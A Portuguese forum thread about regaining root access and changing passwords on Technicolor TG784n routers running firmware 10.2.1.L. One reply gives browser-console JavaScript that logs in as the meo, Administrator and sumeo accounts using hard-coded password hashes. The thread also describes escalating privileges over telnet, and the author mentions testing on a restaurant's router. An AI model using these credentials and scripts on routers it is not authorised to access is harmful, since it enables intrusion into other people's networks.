Como restaurar acessos RootUser e permissões num router TG784n (10.2.1.L)

Como restaurar acessos RootUser e permissões num router TG784n (10.2.1.L)

Contribuinte MancaMulas
Contribuinte

Re: Como restaurar acessos RootUser e permissões num Technicolor TG784n v3 (10.2.1.L)

Boas ner0!

 

Conforme tinha dito acabei de experimentar fazer tudo conforme descreveste e funcionou na perfeição. Bastou fazer tal e qual descreveste. Alterei a password do user Debug, e acabei por criar um novo RootUser tb.

 

Resta-me agradecer-te por teres disponibilizado estes dados ao pessoal, uma vez que deves ter perdido bastante tempo a tentar perceber como contornar esta questão.

 

Mais uma vez o meu MUITO OBRIGADO. Piscadela do Smiley

Assessor Júnior ner0
Assessor Júnior

Re: Como restaurar acessos RootUser e permissões num Technicolor TG784n v3 (10.2.1.L)

Porreiro, ainda bem que funcionou tudo às mil maravilhas! Smiley feliz

 

Partilhei esta informação com todo prazer, até porque era essa a intenção já que nem sequer tenho esta versão do firmware.

Na verdade não demorei assim tanto tempo a descobrir isto (sem querer ser gabarolas), o problema é que antes estava a inventar e a tentar adivinhar com base no meu 10.2.1.D. Mas na semana passada, após ter descoberto que o restaurante onde costumo almoçar recebeu esta famosa atualização de firmware (10.2.1.L) , comecei a ter uma forma concreta de testar as minhas teorias, apesar de praticamente apenas o poder fazer enquanto comia... Smiley de língua

 

Enfim... também devo mencionar que esta abordagem assenta sobre várias coincidências felizes:

- utilizador 'sumeo' poder ativar acesso remoto via telnet;

- acesso remoto permitir escalar privilégios e alterar a password de terceiros (amadorismo puro Smiley feliz);

- utilizador 'nauser' conseguir aceder à página de acesso remoto;

Principiante raposapt
Principiante

Re: Como restaurar acessos RootUser e permissões num Technicolor TG784n v3 (10.2.1.L)

Viva,

Primeira vez que escrevo no forum Smiley feliz

Primeiro, OBRIGADO pela partilha. Se todas as áreas de investigação tivessem este espírito de crowdsourcing, o mundo evoluia 1000x mais depressa.

Eu sou meio-leigo em redes, portanto não deve ser de estranhar que não consegui efectuar o processo.
Encalhei no prasso 3, consegui aceder remotamente à página do router, com ambas as opções, a) e b), mas em ambas, dá-me invalid password para o user nauser, quando coloco o código na consola e carrego enter. experimentei em chrome e firefox.


Tens lá a seguinte nota:

 (NOTA: Se o acesso remoto tiver sido definido como secure, deverás usar HTTPS em vez de HTTP.)

- que se eu percebi, (apesar de não saber como se vê se foi definido como secure), seria pra rescrever a ligação com https:// .
Se for esse o caso, em ambas as opções, com https não me acede à página do router.

Podem ajudar?
thanks!

Assessor Júnior ner0
Assessor Júnior

Re: Como restaurar acessos RootUser e permissões num Technicolor TG784n v3 (10.2.1.L)


raposapt escreveu:

Encalhei no prasso 3, consegui aceder remotamente à página do router, com ambas as opções, a) e b), mas em ambas, dá-me invalid password para o user nauser, quando coloco o código na consola e carrego enter. experimentei em chrome e firefox.


Infelizmente o que descreves dá a entender que o utilizador 'nauser' não tem a password de fábrica, o que apenas pode acontecer se alguém a tiver alterado uma vez que o utilizador tem a mesma palavra-passe desde o firmware anterior.

A questão da ligação segura e do https, esquece... não é importante para o caso.

 

Antes de mais, vamos fazer um teste de login com vários utilizadores (remotamente e localmente). Tenta usar os códigos abaixo para fazer login no teu router quer remotamente (através de ligação externa) ou localmente (192.168.1.254): 

Referência explícita (Spoiler)

Login com utilizador meo:

var user = "meo";
var hash2 = "ed3e2f19f446f857987a6eedc5bb4115";
var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

 

Login com utilizador Administrator:

var user = "Administrator";
var hash2 = "b191e37dc934845ad75cd5d5b3d4b141";
var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

 

Login com utilizador sumeo:

var user = "sumeo";
var hash2 = "118ca30785c2ddf83ec8cab54add5b6a";
var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

Neste caso vais testar cada um deles duas vezes, uma vez localmente e outra remotamente.
Responde com o que acontece em cada caso (remotamente e localmente).

Para além disso, tenta ser o mais especifico possível, porque anteriormente disseste que te dá a mensagem "invalid password" mas em caso nenhum podes obter essa mensagem, apenas esta:

O nome de utilizador e a password que inseriu está incorreta. Por favor verifique e tente de novo.

ou esta:

The username or password you've entered is incorrect. Please check and try again

 

Principiante raposapt
Principiante

Re: Como restaurar acessos RootUser e permissões num Technicolor TG784n v3 (10.2.1.L)

Ya, a parte de "secure" disabled ou enabled via-se na telnet. já reparei.

Desculpa ter sido impreciso! Tens razão.
Sim era mesmo essa a mensagem :

O nome de utilizador e a password que inseriu está incorreta. Por favor verifique e tente de novo.

Então... tentei tudo, remota e localmente, firefox e chrome: todos os useres sem excepção deram a mesma messagem.
quando faço o codigo, o user aparece por momentos no campo do "nome de utilizador", e desaparece do campo aparecendo a mensagem de erro:" O nome de utilizador e a password que inseriu está incorreta. Por favor verifique e tente de novo."
usei a proxy numa tab, e o ip do router na tab ao lado, pra ser + facil o copy/paste, e nao tar a trocar de rede.
Pareceu-me que alguma coisa estava mal na "tradução" (espero ser este o termo) da pass de todos os users.
Porque consigo com todos, pelo endereço do router, escrevendo manualmente o login.
Mas Tentei escrevendo manualmente também por proxy, não me apareceu a mensagem do "nome utlizador e pass incorrecto", mas pura e simplesmente faz um refresh de frame, e não entra, ficam os espaços em brancos pra preencher novamente.

PS: obrigado pela prontidão na resposta!
DESCULPA TIVE QUE EDITAR, fui impreciso mais uma vez!

Assessor Júnior ner0
Assessor Júnior

Re: Como restaurar acessos RootUser e permissões num Technicolor TG784n v3 (10.2.1.L)

Está resolvido.

Para que se conste, o router do @raposapt é o TG784n e não o TG784n v3

Vou acrescentar as instruções no tutorial (apenas login do 'nauser' é diferente)

Moderador
Moderador

Re: Como restaurar acessos RootUser e permissões num Technicolor TG784n v3 (10.2.1.L)

Olá @ner0 

 

Parabéns pelo seu esforço e muito obrigado pelo contributo. Eu já suspeitava que algo se podia tentar pelo acesso remoto, só não houve mesmo oportunidade de testar.

 

Ainda bem que vão aparecendo mais contribuidores com este espirito, pois se a nossa disponibilidade é pouca e, não podemos focar-nos em todas as questões que surgem, que nos valham os numeros e exemplos como o seu.

 

Atentamente,

NeoPT
Moderador MEO Fórum
Visitante megaraider
Visitante

Re: Como restaurar acessos RootUser e permissões num router TG784n (10.2.1.L)

Olá ner0,


ner0 escreveu:

Deixo um grande abraço para Alex Kemp, administrador do fórum www.modem-help.co.uk, que fechou hoje as portas após 10 anos online e que contribuiu imenso na disseminação de informação associada a estes equipamentos de rede.Thanks for everything, Alex! Smiley feliz


Eu perdi a informação sobre o encerramento do site de Alex Kemp Smiley triste

Sabes a razão do encerramento?

O conteudo do site foi completamente perdida ou foi transferida para algum mirror/archieve?

Assessor Júnior ner0
Assessor Júnior

Re: Como restaurar acessos RootUser e permissões num router TG784n (10.2.1.L)


megaraider escreveu:

Olá ner0,


ner0 escreveu:

Deixo um grande abraço para Alex Kemp, administrador do fórum www.modem-help.co.uk, que fechou hoje as portas após 10 anos online e que contribuiu imenso na disseminação de informação associada a estes equipamentos de rede.Thanks for everything, Alex! Smiley feliz


Eu perdi a informação sobre o encerramento do site de Alex Kemp Smiley triste

Sabes a razão do encerramento?

O conteudo do site foi completamente perdida ou foi transferida para algum mirror/archieve?


Olá @megaraider 

Do pouco que percebi, era suposto o alojamento do site ter sido renovado a dia 20, mas devido a vários problemas técnicos com o serviço de alojamento ao longo dos últimos anos (discos rígidos que falhavam com frequência, etc.), ele decidiu não renovar o contrato. Disse também que não lhe valia a pena estar a ter trabalho a mudar de alojamento porque, para além de dar muito trabalho, não compensava já que o rendimento que ele retirava da publicidade e de quem comprava largura de banda para downloads era uma ninharia. Pessoalmente, acho que isso foi mais um argumento para auto-justificar a falta de vontade em continuar com o projeto.

Infelizmente também não tive tempo de fazer um scraping ao fórum, para manter na integra. O pouco que ainda se encontra, na grande maioria, são caches incompletos de há 6 meses atrás.

 

Ainda o contactei depois do encerramento do site no sentido de saber se, pelo menos, estaria disposto a enviar-me a base de dados do fórum (sem utilizadores, passwords ou e-mails) para poder alojar algures e manter como "mirror/archive", infelizmente as palavras dele foram: "após ponderar, não.Enfim, é uma pena...

Visitante megaraider
Visitante

Re: Como restaurar acessos RootUser e permissões num router TG784n (10.2.1.L)

Olá ner0,

Compreendo os motivos do Alex. Mas é lastimável assistir à perda de tanta informação relevante. Smiley frustrado
Vou tentar convence-lo a ceder os ficheiros para serem alojados num servidor, com os devidos créditos obviamente.
Se obtiver algum sucesso contacto.